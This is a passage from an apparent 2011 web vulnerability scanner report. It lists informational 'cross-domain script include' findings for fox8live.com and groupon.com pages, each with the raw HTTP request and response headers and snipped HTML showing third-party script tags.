18.30. http://www.fox8live.com/business/iframe_indexwatch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/iframe_indexwatch.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/iframe_indexwatch.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uts=12; __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:39:00 GMT
Age: 4
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 5204
Connection: keep-alive
Content-Length: 5204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.31. http://www.fox8live.com/content/aboutus/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/aboutus/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/aboutus/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:52 GMT
Age: 43
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 29278
Connection: keep-alive
Content-Length: 29278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.32. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/lee_zurik_investigation/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/lee_zurik_investigation/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:05 GMT
Age: 39
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 40317
Connection: keep-alive
Content-Length: 40317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.33. http://www.fox8live.com/content/news/seregni/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/seregni/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/seregni/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:08 GMT
Age: 36
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 43733
Connection: keep-alive
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.34. http://www.fox8live.com/content/news/watercooler/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/watercooler/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/watercooler/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/seregni/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:27 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:27 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27624
Connection: keep-alive
Content-Length: 27624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.35. http://www.fox8live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: rf-ms iad-agg-n30 ( iad-agg-n22), ht iad-agg-n22.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:40:50 GMT
Age: 44
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 102042
Connection: keep-alive
Content-Length: 102042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<br />
       

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.36. http://www.fox8live.com/entertainment/horoscopes/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /entertainment/horoscopes/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/horoscopes/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/aboutus/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:33 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 22933
Connection: keep-alive
Content-Length: 22933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.37. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57286
Connection: keep-alive
Content-Length: 57286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<meta name="alexaVerifyID" content="6_05Z3bgdqMgJ7MwPLDUl06ev-8" /><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=inergizedm"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script src="http://idm.img.entriq.net/dayportcore/dpm/DayPortPlayers.js?v=20070107" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.38. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HitCount_f50e95bc-67af-48eb-8d01-767a4029b6a1_0=1; uts=12; __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:42 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n20), ms iad-agg-n20 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 60505
Connection: keep-alive
Content-Length: 60505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<meta name="alexaVerifyID" content="6_05Z3bgdqMgJ7MwPLDUl06ev-8" /><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=inergizedm"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script src="http://idm.img.entriq.net/dayportcore/dpm/DayPortPlayers.js?v=20070107" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.39. http://www.fox8live.com/rss/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /rss/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rss/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:02 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27462
Connection: keep-alive
Content-Length: 27462


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.40. http://www.fox8live.com/wireless/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /wireless/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wireless/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:59 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 20605
Connection: keep-alive
Content-Length: 20605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.41. http://www.groupon.com/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /learn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 200
ETag: "0345c004e46753e8c959a4f64568fdd0"
X-Runtime: 100
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://assets1.grouponcdn.com/javascripts/views/demographics.js?corQwi_S" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/learn/fader.js?FXhvj5RB" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.42. http://www.groupon.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
